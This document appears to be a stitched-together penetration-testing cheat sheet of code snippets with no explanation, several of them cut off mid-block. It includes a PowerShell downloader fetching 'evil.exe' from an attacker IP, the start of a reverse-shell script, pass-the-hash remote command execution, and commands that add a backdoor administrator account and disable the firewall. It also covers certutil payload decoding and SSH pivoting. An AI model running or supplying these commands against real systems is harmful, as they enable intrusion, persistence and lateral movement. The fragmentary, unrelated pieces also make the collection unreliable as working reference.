```bat
echo -----BEGIN CERTIFICATE----- > encoded.txt
echo Just Base64 encode your binary data
echo TVoAAA== >> encoded.txt
echo -----END CERTIFICATE----- >> encoded.txt
certutil -decode encoded.txt decoded.bin
```

```xml
<?xml version="1.0" encoding="utf-8" ?>
<otrs_package version="1.1">
<Name>MyModule</Name>
<Version>1.0.0</Version>
<Vendor>My Module</Vendor>
<URL>http://otrs.org/</URL>
<License>GNU GENERAL PUBLIC LICENSE Version 2, June 1991</License>
<ChangeLog Version="1.0.1" Date="2006-11-11 11:11:11">My Module.</ChangeLog>
<Description Lang="en">MyModule</Description>
<Framework>5.x.x</Framework>
```

```bash
#!/bin/bash
TARGET=$1
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "systeminfo"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "whoami /all"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "ipconfig /all"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "netstat -ano"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net accounts"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net localgroup USERNAMEs"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net share"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net view"
```

```bat
@echo off
REM Description: Script that queries all services and searches for executables that give the Everyone group RW access.
REM Type: Incorrect file permissions
REM Note: The ^ character escapes certain characters that break the FOR loop.
REM Note: tokens=1* - The value at the first delimiter and everything after.
for /f "tokens=1*" %%m in ('sc query state^= all ^| find "SERVICE_NAME"') do (
    for /f "tokens=1* delims=: " %%r in ('sc qc "%%~n" ^| find "BINARY_PATH_NAME"') do (
        for /f "delims=" %%x in ('echo(%%~s^| findstr /L /V /I /C:"%SystemRoot%\System32" /C:"%SystemRoot%\SysWOW64"') do (
            icacls "%%~x"
        )
    )
)
```

```python
#!/usr/bin/python
import sys
def split_by_length(s,block_size):
    w=[]
    n=len(s)
    for i in range(0,n,block_size):
        w.append(s[i:i+block_size])
    if w[-1].isspace():
```

```bat
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://192.168.10.52:8000/evil.exe" >>wget.ps1
echo $file = "new-exploit.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
```

```python
#!/usr/bin/python
# imports here
# Copyright 2012 TrustedSec, LLC. All rights reserved.
#
# This piece of software code is licensed under the FreeBSD license.
#
# Visit http://www.freebsd.org/copyright/freebsd-license.html for more information.
import socket,subprocess
HOST = '192.168.12.45' # The remote host
PORT = 443 # The same port as used by the server
```

```text
##SOCKS Proxy##
#Set up a SOCKS proxy on 127.0.0.1:1080 that lets you pivot through the remote host (10.0.0.1):
#Command line:
ssh -D 127.0.0.1:1080 10.0.0.1
#~/.ssh/config:
Host 10.0.0.1
    DynamicForward 127.0.0.1:1080
#You can then use tsocks or similar to use non-SOCKS-aware tools on hosts accessible from 10.0.0.1:
```

```text
#add a user
net user ryan mwcb /add
#add user to local administrators
net localgroup administrators /add ryan
#remove firewall
netsh firewall set opmode disable
#enabled remote desktop
```

```bash
#get a pty through python
python -c 'import pty; pty.spawn("/bin/bash");'
#grab the user agent from the http header on port 10443
tcpdump -A -l -vvvs 1024 -npi eth0 port 10443
#base64 decode a string
echo STRINGTODECODE | base64 --decode
#escape jail shell
```